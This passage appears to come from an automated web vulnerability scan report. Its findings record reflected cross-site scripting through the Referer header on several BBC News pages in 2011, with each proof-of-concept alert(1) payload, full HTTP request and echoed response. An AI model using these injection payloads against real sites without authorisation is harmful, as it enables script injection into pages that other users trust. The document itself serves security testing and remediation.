       uri: '/news/uk-wales-124333
...[SNIP]...

1.90. http://www.bbc.co.uk/news/world-12428938 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12428938

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27b47'-alert(1)-'dd1de994a93 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-12428938 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=27b47'-alert(1)-'dd1de994a93

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=771
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=442d75351eca26df590d6a4ee164a2e09ac1ec92f0a0f1aa049b7a74622c8bba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=442d75351eca26df590d6a4ee164a2e09ac1ec92f0a0f1aa049b7a74622c8bba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 48627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476207000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=27b47'-alert(1)-'dd1de994a93',
       section: 'world',
       sectionPath: '/World',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428938',
       assetType: 'photo_gallery',
       uri: '/news/world-1
...[SNIP]...

1.91. http://www.bbc.co.uk/news/world-middle-east-12435798 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12435798

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0ffe'-alert(1)-'8cabc5ac833 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12435798 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b0ffe'-alert(1)-'8cabc5ac833

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:51 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:51 GMT
Connection: close
Set-Cookie: BBC-UID=d4bd85e5ceea98d7eaae182dd18380aa211c933280e0b1493bdb834ec06ee49c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d4bd85e5ceea98d7eaae182dd18380aa211c933280e0b1493bdb834ec06ee49c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 72129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476231000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=b0ffe'-alert(1)-'8cabc5ac833',
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435798',
       assetType: 'story',
       uri: '/ne
...[SNIP]...

1.92. http://www.bbc.co.uk/news/world-middle-east-12437440 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437440

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d69be'-alert(1)-'cdb51ad3ad9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437440 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d69be'-alert(1)-'cdb51ad3ad9

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:48 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:48 GMT
Connection: close
Set-Cookie: BBC-UID=042d2575ee3a58d4dbcc933a311e4b35fe26282a40b05149cb4b92cdb4bf510e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:48 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=042d2575ee3a58d4dbcc933a311e4b35fe26282a40b05149cb4b92cdb4bf510e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:48 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476228000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d69be'-alert(1)-'cdb51ad3ad9',
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437440',
       assetType: 'media_asset',
       uri
...[SNIP]...

1.93. http://www.bbc.co.uk/news/world-middle-east-12437881 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437881

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3584c'-alert(1)-'5096f56773c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437881 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3584c'-alert(1)-'5096f56773c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:49 GMT
Keep-Alive: timeout=10, max=788
Expires: Sat, 12 Feb 2011 02:03:49 GMT
Connection: close
Set-Cookie: BBC-UID=442d25358e3a3895a9a901ba31e8b7c3332d9998406051398b5b7334e1e4fabe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=442d25358e3a3895a9a901ba31e8b7c3332d9998406051398b5b7334e1e4fabe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476229000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=3584c'-alert(1)-'5096f56773c',
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437881',
       assetType: 'media_asset',
       uri
...[SNIP]...

1.94. http://www.bbc.co.uk/news/world-middle-east-12437912 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437912

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bcda'-alert(1)-'a13dd14ffdc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437912 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7bcda'-alert(1)-'a13dd14ffdc

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:49 GMT
Keep-Alive: timeout=10, max=715
Expires: Sat, 12 Feb 2011 02:03:49 GMT
Connection: close
Set-Cookie: BBC-UID=049dc5a5eebaa8656b3c138f816fe03414f6863b90501109fb1bc26da4bfd1fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=049dc5a5eebaa8656b3c138f816fe03414f6863b90501109fb1bc26da4bfd1fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476229000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=7bcda'-alert(1)-'a13dd14ffdc',
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437912',
       assetType: 'media_asset',
       uri
...[SNIP]...

1.95. http://www.bbc.co.uk/news/world-middle-east-12437922 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437922

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43865'-alert(1)-'eab3b7e3aa4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437922 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=43865'-alert(1)-'eab3b7e3aa4

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:48 GMT
Keep-Alive: timeout=10, max=752
Expires: Sat, 12 Feb 2011 02:03:48 GMT
Connection: close
Set-Cookie: BBC-UID=d47db5b5ce6a68c40b29ca1ad1935f1e6ea459dec0f091a9ebdb735fab14529e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:48 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d47db5b5ce6a68c40b29ca1ad1935f1e6ea459dec0f091a9ebdb735fab14529e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:48 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476228000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=43865'-alert(1)-'eab3b7e3aa4',
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437922',
       assetType: 'media_asset',
       uri
...[SNIP]...

1.96. http://www.bbc.co.uk/news/world-south-asia-12427513 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427513

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bf95'-alert(1)-'08aab8b8dce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12427513 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6bf95'-alert(1)-'08aab8b8dce

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:49 GMT
Keep-Alive: timeout=10, max=641
Expires: Sat, 12 Feb 2011 02:03:49 GMT
Connection: close
Set-Cookie: BBC-UID=243df5b52edac8951ab4888c9191115fb456b80670c061d95b0bc3ff6155d7fa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=243df5b52edac8951ab4888c9191115fb456b80670c061d95b0bc3ff6155d7fa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476229000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6bf95'-alert(1)-'08aab8b8dce',
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427513',
       assetType: 'story',
       uri: '/news
...[SNIP]...

1.97. http://www.bbc.co.uk/news/world-south-asia-12427518 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427518

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45004'-alert(1)-'624fcec322a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12427518 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=45004'-alert(1)-'624fcec322a

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:51 GMT
Keep-Alive: timeout=10, max=769
Expires: Sat, 12 Feb 2011 02:03:51 GMT
Connection: close
Set-Cookie: BBC-UID=448d75c5fefa58a7d7239706f1aa8862d9ad33391010014ad46b3a9564c10c7c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448d75c5fefa58a7d7239706f1aa8862d9ad33391010014ad46b3a9564c10c7c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476231000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=45004'-alert(1)-'624fcec322a',
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427518',
       assetType: 'story',
       uri: '/news
...[SNIP]...

1.98. http://www.bbc.co.uk/news/world-south-asia-12437087 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12437087

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9732a'-alert(1)-'803905a719 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12437087 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9732a'-alert(1)-'803905a719

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:51 GMT
Keep-Alive: timeout=10, max=776
Expires: Sat, 12 Feb 2011 02:03:51 GMT
Connection: close
Set-Cookie: BBC-UID=048d75755e0ad8e7fa87a749c1821076ebfcff3260c0413af47baab59d80f6b40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=048d75755e0ad8e7fa87a749c1821076ebfcff3260c0413af47baab59d80f6b40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476231000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=9732a'-alert(1)-'803905a719',
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437087',
       assetType: 'story',
       uri: '/news
...[SNIP]...

1.99. http://www.bbc.co.uk/news/world-us-canada-12411274 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12411274

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1911a'-alert(1)-'aca9f8c5523 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12411274 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1911a'-alert(1)-'aca9f8c5523

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:52 GMT
Keep-Alive: timeout=10, max=629
Expires: Sat, 12 Feb 2011 02:03:52 GMT
Connection: close
Set-Cookie: BBC-UID=642df5e57e7ad808da84c92f91cd30f8669a963520901109dbcb133fa115d7ba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:52 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=642df5e57e7ad808da84c92f91cd30f8669a963520901109dbcb133fa115d7ba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:52 GMT; path=/; domain=bbc.co.uk;
Content-Length: 62068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476232000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=1911a'-alert(1)-'aca9f8c5523',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12411274',
       assetType: 'story',
       uri:
...[SNIP]...

1.100. http://www.bbc.co.uk/news/world-us-canada-12435117 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12435117

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb6fe'-alert(1)-'ec6e2db7529 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12435117 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fb6fe'-alert(1)-'ec6e2db7529

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:53 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:03:53 GMT
Connection: close
Set-Cookie: BBC-UID=543d4505be4af809aab46757d18edd81d4b3fdc13040e1ca948beae667e467d80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=543d4505be4af809aab46757d18edd81d4b3fdc13040e1ca948beae667e467d80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


